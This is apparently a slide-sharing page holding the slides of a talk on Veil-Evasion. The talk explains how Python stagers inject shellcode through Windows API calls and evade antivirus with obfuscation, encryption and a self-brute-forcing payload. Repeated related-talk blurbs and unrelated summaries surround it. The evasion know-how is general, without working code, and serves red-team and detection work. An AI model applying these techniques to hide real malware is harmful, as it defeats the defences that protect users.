This talk is about how a single python tool (Veil aka Veil-Evasion) is able to render AntiVirus useless. Veil's goal is to bypass antivirus products on workstations and servers.
This talk goes over the art of antivirus evasion, or really the lack thereof. I talk about a new module that's getting added into Veil-Evasion, a signature that was developed for Veil, and creating your own processes for approaching unknowns.
This is the slide deck I gave when presenting at FSU's AITP Meeting. The goal was to give a high level description of what Pen Testing/Red Teaming is and what the job entails.
The Supporting Role of Antivirus Evasion while PersistingCTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
This talk is about developing malware in higher level languages. Languages such as Python or C# can give you the flexibility to quickly develop malware and use it on client engagements.
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
This document summarizes the EyeWitness tool for automated network discovery and host identification. It discusses the typical assessment lifecycle, initial discovery and recon steps using Nmap and Nessus, and the need to automate analysis of large lists of web servers. The development of EyeWitness is described, from an initial proof of concept to version 2.0, which improved modularity, added protocol support, signature-based categorization and the ability to resume incomplete scans. Future work may include additional modules, protocols, and optical character recognition.
This is the talk given at NullCon 2017. This talk give s history of the Veil Framework, and showcases the differences between 2.0 and the newly released 3.0. Veil 3.0 is released in this talk
This talk describes the current state of the Veil-Framework and the different tools included in it such as Veil-Evasion, Veil-Catapult, Veil-Powerview, Veil-Pillage, Veil-Ordnance
This talk goes over the art of antivirus evasion, or really the lack thereof. I talk about a new module that's getting added into Veil-Evasion, a signature that was developed for Veil, and creating your own processes for approaching unknowns.
This is the slide deck I gave when presenting at FSU's AITP Meeting. The goal was to give a high level description of what Pen Testing/Red Teaming is and what the job entails.
The Supporting Role of Antivirus Evasion while PersistingCTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
This talk is about developing malware in higher level languages. Languages such as Python or C# can give you the flexibility to quickly develop malware and use it on client engagements.
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
This document summarizes the EyeWitness tool for automated network discovery and host identification. It discusses the typical assessment lifecycle, initial discovery and recon steps using Nmap and Nessus, and the need to automate analysis of large lists of web servers. The development of EyeWitness is described, from an initial proof of concept to version 2.0, which improved modularity, added protocol support, signature-based categorization and the ability to resume incomplete scans. Future work may include additional modules, protocols, and optical character recognition.
This is the talk given at NullCon 2017. This talk give s history of the Veil Framework, and showcases the differences between 2.0 and the newly released 3.0. Veil 3.0 is released in this talk
This talk describes the current state of the Veil-Framework and the different tools included in it such as Veil-Evasion, Veil-Catapult, Veil-Powerview, Veil-Pillage, Veil-Ordnance
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreCTruncer
This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.
Veil-Ordnance is a new tool recently added into the Veil-Framework. It's designed to quickly generate shellcode for exploits or use inside backdoor executables.
This talk is about why I believe having the ability to write tools and/or scripts can help elevate a Pen Testers game to the next level.
The talk is case study driven by the different scenarios I've encountered on assessments and the scripts or tools that have been developed as a result.
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000CTruncer
This document summarizes a talk about improvements to endpoint security in Windows 10 and how attackers have adapted. It discusses defenses like Device Guard and code integrity policies, as well as WMImplant, a tool developed by the presenters to operate on Device Guard systems using only Windows Management Instrumentation (WMI). WMImplant allows tasks like command execution, file transfer, and persistence via encoding and storing data in WMI properties. It also outlines methods defenders can use to detect malicious WMI usage like active WMI monitoring and the WMIMonitor tool.
CheckPlease is a tool that provides payload-agnostic checks to determine if malware is running in a targeted environment or sandbox. It evolved from signatures to behavioral detection as malware changed languages and used obfuscation. CheckPlease implements over 70 checks across multiple languages to validate processes, user behavior, system metadata and environment matches the target before executing malicious code. The presenters demonstrate various checks and encourage integrating CheckPlease with frameworks like Veil to automatically generate targeted malware payloads.
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationCTruncer
This presentation documents how Egress-Assess can be used on assessments to simulate exfiltrating data over a variety of protocols.
Additionally, this presentation documents the addition of malware modules into Egress-Assess. The new malware modules allow users to emulate different pieces of malware families by using documented malware indicators.
- The document discusses techniques for making payloads more targeted and resistant to sandbox analysis, including checking for expected parent processes, encrypting payloads with host-specific keys, and checking for signs of user interaction.
- It proposes a new open-source library called "CheckPlease" that implements these techniques across multiple programming languages to help red and blue teams.
- Examples are given of how to check for things like expected Windows domains, user accounts, mouse clicks or positions to ensure a payload is running in the intended targeted environment and not a sandbox.
Egress-Assess and Owning Data ExfiltrationCTruncer
This talk discusses how Egress-Assess can be used to help attackers and defenders learn how to exfiltrate data outside of their network over a variety of protocols, describes how data is exfiltrated over different supported protocols, and demonstrates the weaponization of the tool!
This is the slide deck that I used when presenting at FSU's Cyber Security Club. This presentation was supposed to give a description of what Red Teaming, Pen Testing, and other roles do.
This document provides an introduction to studying, collecting, and finding bugs. It discusses how to collect bugs by following security mailing lists, bug bounty programs, security researchers on Twitter. It also discusses how to study bugs by analyzing code diffs between vulnerable and patched versions, building test environments, and documenting findings. The document then covers hunting for bugs by finding targets on sites like GitHub and HackerNews, setting up test environments, and optimizing hunting strategies based on collected bugs. Finally, it discusses responsible disclosure of bugs and some of the author's favorite bugs.
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
Patching Windows Executives with the Backdoor Factory is a presentation about binary patching techniques. It discusses the history of patching, how key generators and Metasploit patch binaries, and how the author learned to manually patch binaries. The presentation then introduces the Backdoor Factory tool, which can automatically patch Windows binaries by injecting shellcode into code caves. It demonstrates patching via code cave insertion, single cave jumps, and cave jumping. Mitigations like self-validation and antivirus are discussed.
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
The developer is an easy and valuable target for malicious minds. The reasons for that are numerous and hard to come by. This talk delivers examples, proof, discussion and awkward moments in a pretty special way.
Everybody hates developers – especially web developers. And why not? The cracks and crevices of their APIs and implementations are the reason that vulnerabilities in web applications are still a widespread issue – and will continue to be in the foreseeable future.
Bashing and blaming them for their wrongdoings is fun – boy, they are stupid in their mistakes! But has anyone ever dared to have an open on stage battle with an actual developer?
And who of the developers dares to face their collective nemesis – the attacker? Can there be life where matter and anti-matter collide? We will know about this soon – because this is what this talk is going to be about. Developer versus attacker – vulnerability versus defense. Be prepared for swearing, violence and people leaving the stage prematurely in tears.
This document discusses techniques for going beyond automated tools and scans to hunt for vulnerabilities and gather intelligence as an information security professional. It provides defensive use cases like analyzing pcap files with tcpdump and Dshell to profile network activity. Offensive techniques discussed include pushing past roadblocks during pentests, abusing features like contact forms, and testing remediation. It emphasizes the value of learning scripting languages like Python to build your own tools for tasks like vulnerability scanning and demonstrating proof of concepts. The overall message is that security professionals should adopt a hunter/gatherer mindset to find issues missed by automated tools alone.
Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
One of the main functional components of enterprise applications and Internet portals is an authentication and access control system (AuthC/Z). In this presentation, we describe a popular access control system called ForgeRock OpenAM from the external security point of view. We show the scenarios of full enterprise application compromise through complex attacks which employ both LFI and SSRF.
Building world-class security response and secure development processesDavid Jorm
The document discusses building world-class security response and secure development processes for OpenDaylight. It outlines the SDN attack surface, recent vulnerabilities in OpenDaylight, and defensive technologies. It discusses security response best practices for open source projects and secure engineering best practices. The current status of OpenDaylight security response and engineering is described, along with the vision to improve reactive security response capabilities and implement more proactive security measures like automated checks and security training.
The document discusses techniques for obfuscating PowerShell commands to evade detection. It begins by motivating the need for improved PowerShell logging and detection capabilities as PowerShell is increasingly used by attackers. It then outlines ways to prepare systems for PowerShell investigations through process auditing and command line logging. One section focuses on obfuscating the common technique of using New-Object Net.WebClient to perform remote downloads. It demonstrates how this command can be broken up and variables used to avoid detection based solely on the presence of certain strings.
EyeWitness - A Web Application Triage ToolCTruncer
EyeWitness is a web application triage tool. It's designed to take a file from the user containing web pages, gather server header information, take a screenshot of the web page, and then organize all the information in a report. Additionally, EyeWitness will warn you about invalid SSL certificates, and attempt to identify any default credentials that may apply to the website.
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreCTruncer
This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.
Veil-Ordnance is a new tool recently added into the Veil-Framework. It's designed to quickly generate shellcode for exploits or use inside backdoor executables.
This talk is about why I believe having the ability to write tools and/or scripts can help elevate a Pen Testers game to the next level.
The talk is case study driven by the different scenarios I've encountered on assessments and the scripts or tools that have been developed as a result.
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000CTruncer
This document summarizes a talk about improvements to endpoint security in Windows 10 and how attackers have adapted. It discusses defenses like Device Guard and code integrity policies, as well as WMImplant, a tool developed by the presenters to operate on Device Guard systems using only Windows Management Instrumentation (WMI). WMImplant allows tasks like command execution, file transfer, and persistence via encoding and storing data in WMI properties. It also outlines methods defenders can use to detect malicious WMI usage like active WMI monitoring and the WMIMonitor tool.
CheckPlease is a tool that provides payload-agnostic checks to determine if malware is running in a targeted environment or sandbox. It evolved from signatures to behavioral detection as malware changed languages and used obfuscation. CheckPlease implements over 70 checks across multiple languages to validate processes, user behavior, system metadata and environment matches the target before executing malicious code. The presenters demonstrate various checks and encourage integrating CheckPlease with frameworks like Veil to automatically generate targeted malware payloads.
What Goes In Must Come Out: Egress-Assess and Data ExfiltrationCTruncer
This presentation documents how Egress-Assess can be used on assessments to simulate exfiltrating data over a variety of protocols.
Additionally, this presentation documents the addition of malware modules into Egress-Assess. The new malware modules allow users to emulate different pieces of malware families by using documented malware indicators.
- The document discusses techniques for making payloads more targeted and resistant to sandbox analysis, including checking for expected parent processes, encrypting payloads with host-specific keys, and checking for signs of user interaction.
- It proposes a new open-source library called "CheckPlease" that implements these techniques across multiple programming languages to help red and blue teams.
- Examples are given of how to check for things like expected Windows domains, user accounts, mouse clicks or positions to ensure a payload is running in the intended targeted environment and not a sandbox.
Egress-Assess and Owning Data ExfiltrationCTruncer
This talk discusses how Egress-Assess can be used to help attackers and defenders learn how to exfiltrate data outside of their network over a variety of protocols, describes how data is exfiltrated over different supported protocols, and demonstrates the weaponization of the tool!
This is the slide deck that I used when presenting at FSU's Cyber Security Club. This presentation was supposed to give a description of what Red Teaming, Pen Testing, and other roles do.
This document provides an introduction to studying, collecting, and finding bugs. It discusses how to collect bugs by following security mailing lists, bug bounty programs, security researchers on Twitter. It also discusses how to study bugs by analyzing code diffs between vulnerable and patched versions, building test environments, and documenting findings. The document then covers hunting for bugs by finding targets on sites like GitHub and HackerNews, setting up test environments, and optimizing hunting strategies based on collected bugs. Finally, it discusses responsible disclosure of bugs and some of the author's favorite bugs.
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
Patching Windows Executives with the Backdoor Factory is a presentation about binary patching techniques. It discusses the history of patching, how key generators and Metasploit patch binaries, and how the author learned to manually patch binaries. The presentation then introduces the Backdoor Factory tool, which can automatically patch Windows binaries by injecting shellcode into code caves. It demonstrates patching via code cave insertion, single cave jumps, and cave jumping. Mitigations like self-validation and antivirus are discussed.
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
The developer is an easy and valuable target for malicious minds. The reasons for that are numerous and hard to come by. This talk delivers examples, proof, discussion and awkward moments in a pretty special way.
Everybody hates developers – especially web developers. And why not? The cracks and crevices of their APIs and implementations are the reason that vulnerabilities in web applications are still a widespread issue – and will continue to be in the foreseeable future.
Bashing and blaming them for their wrongdoings is fun – boy, they are stupid in their mistakes! But has anyone ever dared to have an open on stage battle with an actual developer?
And who of the developers dares to face their collective nemesis – the attacker? Can there be life where matter and anti-matter collide? We will know about this soon – because this is what this talk is going to be about. Developer versus attacker – vulnerability versus defense. Be prepared for swearing, violence and people leaving the stage prematurely in tears.
This document discusses techniques for going beyond automated tools and scans to hunt for vulnerabilities and gather intelligence as an information security professional. It provides defensive use cases like analyzing pcap files with tcpdump and Dshell to profile network activity. Offensive techniques discussed include pushing past roadblocks during pentests, abusing features like contact forms, and testing remediation. It emphasizes the value of learning scripting languages like Python to build your own tools for tasks like vulnerability scanning and demonstrating proof of concepts. The overall message is that security professionals should adopt a hunter/gatherer mindset to find issues missed by automated tools alone.
Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
One of the main functional components of enterprise applications and Internet portals is an authentication and access control system (AuthC/Z). In this presentation, we describe a popular access control system called ForgeRock OpenAM from the external security point of view. We show the scenarios of full enterprise application compromise through complex attacks which employ both LFI and SSRF.
Building world-class security response and secure development processesDavid Jorm
The document discusses building world-class security response and secure development processes for OpenDaylight. It outlines the SDN attack surface, recent vulnerabilities in OpenDaylight, and defensive technologies. It discusses security response best practices for open source projects and secure engineering best practices. The current status of OpenDaylight security response and engineering is described, along with the vision to improve reactive security response capabilities and implement more proactive security measures like automated checks and security training.
The document discusses techniques for obfuscating PowerShell commands to evade detection. It begins by motivating the need for improved PowerShell logging and detection capabilities as PowerShell is increasingly used by attackers. It then outlines ways to prepare systems for PowerShell investigations through process auditing and command line logging. One section focuses on obfuscating the common technique of using New-Object Net.WebClient to perform remote downloads. It demonstrates how this command can be broken up and variables used to avoid detection based solely on the presence of certain strings.
EyeWitness - A Web Application Triage ToolCTruncer
EyeWitness is a web application triage tool. It's designed to take a file from the user containing web pages, gather server header information, take a screenshot of the web page, and then organize all the information in a report. Additionally, EyeWitness will warn you about invalid SSL certificates, and attempt to identify any default credentials that may apply to the website.
1. The document discusses the key chemical elements that make up the human body, including oxygen, carbon, hydrogen, nitrogen, calcium, and phosphorus.
2. It also explains the structure of atoms and how they form bonds through ionic and covalent interactions. Water is highlighted as being an ideal solvent for life due to its unique properties arising from hydrogen bonding.
3. The roles of acids, bases, and pH in solutions are covered. Buffers are described as substances that help maintain a stable pH when acids or bases are introduced.
Nouveaux outils et dérives de la communication politique : interview exclusiv...Damien ARNAUD
Anne-Claire Ruel (@AnneClaireRuel) est enseignante à l’Université de Cergy-Pontoise, conseillère en stratégie d’opinion et chroniqueuse sur FranceTV Info et LCI.
The document discusses a talk titled "Docker might not be your friend - Trojanizing Docker like a Sir" given by Daniel García and Roberto Muñoz. The talk covers what Docker is, the Docker environment including components like Docker hosts, registries, and orchestrators. It also discusses continuous integration/continuous deployment cycles and how Docker fits into those processes. The slides provide definitions and diagrams to explain these concepts.
Rise of the Open Source Program Office for LinuxCon 2016Gil Yehuda
Open Source Program Offices collaborate on open source, policy, governance, and github to help developers improve successful outcomes for open source strategy. We describe why OSPOs are emerging, how they work, and what this means to the open source industry. We highlight a Linux Foundation sponsored collaboration called the TODOGroup where program office directors are meeting to coordinate efforts and ideas.
The presentation was delivered at LinuxCon and ContainerCon in Tokyo, Japan in July 2016.
This document discusses Python tools for reverse engineering. It introduces the author and their background in security research. It then provides an overview of existing Python libraries for reverse engineering tasks like disassembly, debugging, fuzzing, and analysis. These include libraries that interface with tools like IDA Pro, gdb, bochs, and more. The document proposes creating a web portal to catalog these Python reverse engineering tools, including descriptions and a search function. It concludes by soliciting feedback on the idea and future work.
Demystifying Binary Reverse Engineering - Pixels CampAndré Baptista
Reverse engineering is not just about uncovering the hidden behaviour of a given technology, system, program or device. It's actually an art and a mindset. Reversing is used by some government agencies, secret services, antivirus software companies, hackers and students. It can be used for many purposes: cracking/bypassing software, botnet analysis, finding 0day exploits, interpreting unknown protocols, understanding malware or finding bugs in apps.
O documento discute técnicas de pentesting usando Python. Ele apresenta vários scripts Python para realizar atividades como varredura de portas, varredura de meio-aberto, varredura FIN e coleta de informações de cabeçalhos HTTP para testar vulnerabilidades em redes. O documento também discute conceitos como pentesting, hackers vs pentesters e porque usar a linguagem Python para pentesting.
James Jesus Bermas on Crash Course on PythonCP-Union
This document provides an overview of the Python programming language. It introduces Python, discusses its uses in industries like Google and Industrial Light & Magic, and covers key Python concepts like data types, functions, object-oriented programming, modules, and tools. The document is intended to explain what Python is and give an introduction to programming in Python.
This document provides an overview of a session on introducing Python programming. It discusses the history and creators of Python, its features as a high-level, general purpose, multi-paradigm language. Examples are given of successful organizations using Python like Google, Mozilla, and CERN. Sample Python code is shown for word counting programs. Common questions about Python versions, development environments, debugging, and performance are addressed. Reasons for Python's readability and popularity over other languages are explored. References for further learning Python are provided.
This document provides an overview of a presentation about using human interface devices like keyboards for penetration testing. The presentation covers using the Teensy microcontroller to create payloads that are executed when the device is plugged into a target system. It demonstrates writing payloads using the Kautilya toolkit to perform attacks like installing backdoors, changing system settings, gathering information, and executing code on Windows and Linux machines. The document also discusses limitations and ways to prevent attacks using malicious human interface devices.
Security Testing for Containerized ApplicationsSoluto
The document discusses security testing for containerized applications. It outlines different layers of containerized apps including code, dependencies, and Docker images. It then describes various security testing techniques that can be applied to each layer, including static analysis tools for code scanning, dependency scanning, and Docker image scanning. It also covers dynamic/runtime testing using passive and active scanning with tools like OWASP Zap. The document advocates building these security tests into the CI/CD pipeline and only deploying container images that pass all tests through a process of image certification. It demonstrates some of these techniques on a sample Lolcode application.
Presented by: Sahdev Zala
Presented at the All Things Open 2021
Raleigh, NC, USA
Raleigh Convention Center
Abstract: When it comes to the importance of writing secure code, it gets a unanimous vote. This is even more important for an open codebase. Remember that there are several areas where code security must be taken into consideration rather than just thinking about authentication and authorization. This talk is focused on identifying common areas in code that get overlooked and poses a security risk from general weaknesses to critical threat. You will also learn about various code analysis techniques and tools, simple examples to avoid common pitfalls and how to use GitHub to easily publish security advisories and CVEs.
DevSecCon Tel Aviv 2018 - Security Testing for Containerised Apps by Omer LeviDevSecCon
This document summarizes a presentation about security testing for containerized applications. It discusses performing static analysis on code, dependencies, and Docker images using open source tools like Bandit, Brakeman, Find Security Bugs, TSLint, OWASP Dependency Track, and Clair. It also covers dynamic analysis using passive and active scanning with OWASP Zap. The presentation demonstrates running these security tests on a sample Lolcode application and integrating the tests into a CI/CD pipeline using OWASP Glue. It provides resources for learning more about security testing of containerized apps.
1) The document discusses a presentation about Go and microservices given by Andrea Di Persio, a backend engineer at SoundCloud.
2) It covers an introduction to Go as a programming language, how SoundCloud uses Go and microservices in their infrastructure and applications, and how SoundCloud implements microservices using Go.
3) Some benefits of using Go and microservices at SoundCloud include isolated services that are easier to reason about and deploy independently while still being able to experiment and take ownership of specific domains.
Adversarial Post-Ex: Lessons From The ProsJustin Warner
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior to improve defensive capabilities.
This document provides an overview of lessons learned from studying post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to realistically emulate adversaries for red team assessments.
Hacking Vulnerable Websites to Bypass FirewallsNetsparker
These slides were used by our security researcher Sven Morgenroth during the live demo of how to hack web applications and bypass firewalls. You can watch the live demo here: https://www.netsparker.com/blog/web-security/vulnerable-web-applications-developers-target/#livedemo
This document discusses the concepts of DevOps, SecOps, and DevSecOps. It describes how the traditional divisions between development, operations, and security can lead to problems, and how adopting a DevOps culture and practices like continuous integration, infrastructure as code, and automation can help break down silos. It emphasizes that DevSecOps is about collaboration, culture change, and bringing security practices into the development lifecycle from the beginning.
This document discusses techniques for analyzing obfuscated malicious web scripts. It begins by noting some limitations and objectives of the analysis. It then covers common obfuscation techniques used such as minification, visual noise, character encoding, and multiple layers of obfuscation. Methods for deobfuscation without wasting time are presented, such as using beautification tools and writing custom scripts. Specific tools are also highlighted that can aid in deobfuscation, like Didier Stevens tools and JavaScript analysis tools. Lastly, it discusses prevention best practices like keeping systems updated and avoiding unknown links/emails.
OWASP AppSec Global 2019 Security & Chaos EngineeringAaron Rinehart
Security today is customarily a reactive and chaotic exercise.
In this session, we will introduce a new concept known as Security Chaos Engineering and how it can be applied to create highly secure, performant, and resilient distributed systems.
DevOpsSec: Appling DevOps Principles to Security, DevOpsDays Austin 2012Nick Galbreath
DevOpsSec applies DevOps principles like decentralization, shared resources, and transparency to security. It focuses on reducing the mean time to detect (MTTD) security issues and mean time to resolve (MTTR) them. Automating security testing and integrating it into continuous integration helps detect attacks and issues earlier. Treating security operations like other services improves culture.
StHack 2014 - Jerome "@funoverip" Nokin Turning your managed av into my botnetStHack
Today centrally managed Anti-Virus (AV) solutions are used across all enterprises and are relied upon to provide central management, logging and enforcement. This talk presents the journey and the results of a reviewing the security posture of the core components of a few selected managed AV solutions, the central servers themselves. Critical security vulnerabilities will be presented, covering SQL Injection, Directory Path Traversal and Buffer Overflow. Particular focus will be given to the different steps required to fully compromise both central management servers and managed stations. Who does not want to transform a major managed AV into his private botnet within minutes?
Jerome Nokin works as a Security Consultant for Verizon Enterprise where he is a senior member of the Vulnerability Management Team mainly focusing on Penetration Tests and Web Application Assessment. Prior to his role at Verizon he worked in the area of security covering both consultancy and ICT.
This presentation was given to a group of SFS students at GW. It's designed to be semi-case study driven on the problems I've encountered on assessments and how programming can help solve them.
This document summarizes a presentation on bridging the gap between penetration testing and red teaming using offensive PowerShell techniques. It introduces Empire, a pure PowerShell post-exploitation agent, and discusses how weak standard images, dirty networks, and domain trusts can be exploited to escalate privileges and move laterally. Various PowerShell modules for tasks like credential dumping, code execution, and lateral movement are demonstrated.
This document discusses different methods for generating wordlists to crack passwords, including social engineering and dictionary attacks. It provides information on the software tool Crunch that can be used to generate wordlists with combinations of characters, numbers, and special characters. The document also covers different wireless security protocols like WEP, WPA, and WPA2 and vulnerabilities in WEP that allow the key to be cracked. It demonstrates social engineering attacks using a tool called Wifiphisher and dictionary attacks against WPA/WPA2 secured networks.
ZKorum: Building the Next Generation eAgora powered by SSISSIMeetup
The immense potential unlocked by SSI in content-centric social networks (forums) is largely unaddressed by the recent wave of decentralized social networks. Enter ZKorum - a network of verifiable communities where members create anonymous polls and discussions. In this episode, Nicolas Gimenez, the Co-Founder and CTO of ZKorum, unveils the Alpha version and delves into its architecture, drawing inspiration from SSI, DWeb, and Password Managers.
Understanding User Behavior with Google Analytics.pdfSEO Article Boost
Unlocking the full potential of Google Analytics is crucial for understanding and optimizing your website’s performance. This guide dives deep into the essential aspects of Google Analytics, from analyzing traffic sources to understanding user demographics and tracking user engagement.
Traffic Sources Analysis:
Discover where your website traffic originates. By examining the Acquisition section, you can identify whether visitors come from organic search, paid campaigns, direct visits, social media, or referral links. This knowledge helps in refining marketing strategies and optimizing resource allocation.
User Demographics Insights:
Gain a comprehensive view of your audience by exploring demographic data in the Audience section. Understand age, gender, and interests to tailor your marketing strategies effectively. Leverage this information to create personalized content and improve user engagement and conversion rates.
Tracking User Engagement:
Learn how to measure user interaction with your site through key metrics like bounce rate, average session duration, and pages per session. Enhance user experience by analyzing engagement metrics and implementing strategies to keep visitors engaged.
Conversion Rate Optimization:
Understand the importance of conversion rates and how to track them using Google Analytics. Set up Goals, analyze conversion funnels, segment your audience, and employ A/B testing to optimize your website for higher conversions. Utilize ecommerce tracking and multi-channel funnels for a detailed view of your sales performance and marketing channel contributions.
Custom Reports and Dashboards:
Create custom reports and dashboards to visualize and interpret data relevant to your business goals. Use advanced filters, segments, and visualization options to gain deeper insights. Incorporate custom dimensions and metrics for tailored data analysis. Integrate external data sources to enrich your analytics and make well-informed decisions.
This guide is designed to help you harness the power of Google Analytics for making data-driven decisions that enhance website performance and achieve your digital marketing objectives. Whether you are looking to improve SEO, refine your social media strategy, or boost conversion rates, understanding and utilizing Google Analytics is essential for your success.
Instagram has become one of the most popular social media platforms, allowing people to share photos, videos, and stories with their followers. Sometimes, though, you might want to view someone's story without them knowing.
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
Italy Agriculture Equipment Market Outlook to 2027harveenkaur52
Agriculture and Animal Care
Ken Research has an expertise in Agriculture and Animal Care sector and offer vast collection of information related to all major aspects such as Agriculture equipment, Crop Protection, Seed, Agriculture Chemical, Fertilizers, Protected Cultivators, Palm Oil, Hybrid Seed, Animal Feed additives and many more.
Our continuous study and findings in agriculture sector provide better insights to companies dealing with related product and services, government and agriculture associations, researchers and students to well understand the present and expected scenario.
Our Animal care category provides solutions on Animal Healthcare and related products and services, including, animal feed additives, vaccination
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfFlorence Consulting
Quattordicesimo Meetup di Milano, tenutosi a Milano il 23 Maggio 2024 dalle ore 17:00 alle ore 18:30 in presenza e da remoto.
Abbiamo parlato di come Axpo Italia S.p.A. ha ridotto il technical debt migrando le proprie APIs da Mule 3.9 a Mule 4.4 passando anche da on-premises a CloudHub 1.0.
Gen Z and the marketplaces - let's translate their needsLaura Szabó
The product workshop focused on exploring the requirements of Generation Z in relation to marketplace dynamics. We delved into their specific needs, examined the specifics in their shopping preferences, and analyzed their preferred methods for accessing information and making purchases within a marketplace. Through the study of real-life cases , we tried to gain valuable insights into enhancing the marketplace experience for Generation Z.
The workshop was held on the DMA Conference in Vienna June 2024.
Bringing Down the House - How One Python Script Ruled Over AntiVirus
1. Bringing Down the House - How
One Python Script Ruled Over
Antivirus
@ChrisTruncer
2. whoami
Chris Truncer
⊡ Systems Administrator turned
Red Teamer
⊡ Red Team Lead at Mandiant
⊡ Open Source Developer
□ Veil-Framework
□ EyeWitness
□ and others...
3. What’s this talk about?
⊡ A pen tester’s problem
⊡ Shellcode injection
⊡ Veil-Evasion
⊡ Veil-Evasion’s approach
⊡ Signature bypass
⊡ Questions
5. What’s My Job?
⊡ Penetration testers and red teamers test the
security of …. Something..
□ A website
□ An application
□ An office’s domain
□ A global distributed network
6. What’s My Job?
⊡ Tests are objective oriented
⊡ We don’t just hack everything for the lulz
⊡ Targeted in nature
□ Access internal payroll systems
□ Access customer lists
□ Steal company secrets
□ Wire money to a controlled account
□ ...etc.
10. Path to the Objective
⊡ Typically we will need to compromise
workstations
⊡ To compromise systems, we introduce
controlled viruses
⊡ However, we run into the same
problems/roadblocks that real attackers do...
12. Our Problem
⊡ Bypassing antivirus is relatively trivial
(demoed later)
⊡ I wanted an automated means to bypass
antivirus
□ Let’s not waste time bypassing AV, use
that time to better assess our customer’s
environment
14. Our Problem
⊡ Myself, Will Schroeder, and Michael Wright
decided to create a framework
□ Aggregate public AV bypass techniques
□ Automate the customization and
compilation process
□ Modularize Veil to easily add new payload
modules
⊡ The output is the source code, and an
executable “stager”
16. Stagers
⊡ Stagers (Veil output) can be referred to as
“stage 1”
⊡ The goal for stagers is to inject shellcode into
memory and run it
⊡ The shellcode can connect to a remote
system, receive additional code
⊡ Think of stagers as a loader for your real
malware
17. Stagers
⊡ Any language that has access to Windows
function calls can be used to write a stager
⊡ So… we started writing them in Python at
first!
□ Debasish Mandal and Mark Baggett both
developed proof of concepts for injecting
shellcode into memory.
18. Stagers
⊡ It’s all done with four function calls
□ VirtualAlloc - Allocate space and assign
memory permissions
□ RtlMoveMemory - Move shellcode into
allocated space
□ CreateThread - Run the shellcode stored in
memory
□ WaitForSingleObject - Don’t exit the
process until the thread is done executing
25. Veil’s Approach
⊡ Veil is designed to beat on-disk detection
through a variety of techniques:
□ Increasing code obfuscation
□ Encrypted code
□ Non-standard languages for Windows
binaries
Python, Perl, Ruby
28. Veil’s Approach
⊡ We observed that using a non-C or C# based
language made a big difference
□ Antivirus didn’t understand how to
properly inspect non-standard languages
⊡ Example
□ C vs. Python
32. Veil’s Approach
⊡ Invested heavily in Python module
development
□ Basic letter substitution
□ Base64 encoded shellcode
□ Encrypted shellcode
⊡ Developed a payload which brute forces itself
33. Stallion
⊡ At runtime, the payload performs a chosen-
ciphertext attack
□ With known ciphertext, it observes the
cleartext output
⊡ Use a constrained keyspace
□ Ex: “IEjy2kDLJ*@%nfs9fSYEbdudfd” +
“123456”
⊡ Loop over the constrained keyspace
⊡ If the decoded ciphertext matches the known
plaintext value, then the key is discovered
38. Veil’s Signature
⊡ This was a step in the right direction by AV
companies
□ We want them to step up their game
⊡ Previous attempts to categorize Veil have
ended up quite humorous...
47. Generating Executables
⊡ Usability - Executable Generation
□ Wine became our best friend
□ Python installed within Wine
□ Required libraries installed within Wine
□ PyInstaller within Python on Wine
⊡ Extended this concept to all languages
□ Go
□ Ruby
□ C#
48. Generating Executables
⊡ We chose PyInstaller and Py2Exe since they
are widely used
□ To prevent AV companies from just
flagging all PyInstaller output
